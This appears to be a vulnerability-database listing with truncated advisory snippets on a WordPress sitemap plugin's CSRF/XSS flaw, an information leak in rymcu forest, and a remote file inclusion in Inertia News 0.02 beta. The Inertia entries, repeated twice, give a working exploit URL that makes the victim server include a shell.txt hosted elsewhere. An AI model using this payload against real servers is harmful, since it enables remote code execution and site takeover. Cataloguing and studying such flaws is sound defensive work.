PT-2025-34993

Name of the Vulnerable Software and Affected Versions: Google XML News Sitemap plugin versions not specified Description: The Google XML News Sitemap plugin contains a Cross-Site Request Forgery CSRF vulnerability that also allows Stored Cross-Site Scripting XSS. Recommendations: At the moment,...

forest Security breach

forest is a modern knowledge community backend project implemented using SpringBoot + Shiro + MyBatis + JWT + Redis. A security vulnerability exists in rymcu forest v.0.02 that allows remote attackers to obtain sensitive information by manipulating the HTTP URL in the...

inertia-rfi.txt

Version : 0.02 beta Error : require "$inewspath/inertiasqlclass.php"; Exploit : http://www.victim.com/inertianewsmain.php?inewspath=http://www.site.com/shell.txt Eno7.Org - Crazy-King.ORg Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim...

Inertia News Remote File İnclude

Version : 0.02 beta Error : require "$inewspath/inertiasqlclass.php"; Exploit : http://www.victim.com/inertianewsmain.php?inewspath=http://www.site.com/shell.txt Eno7.Org - Crazy-King.ORg Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyldz Tim...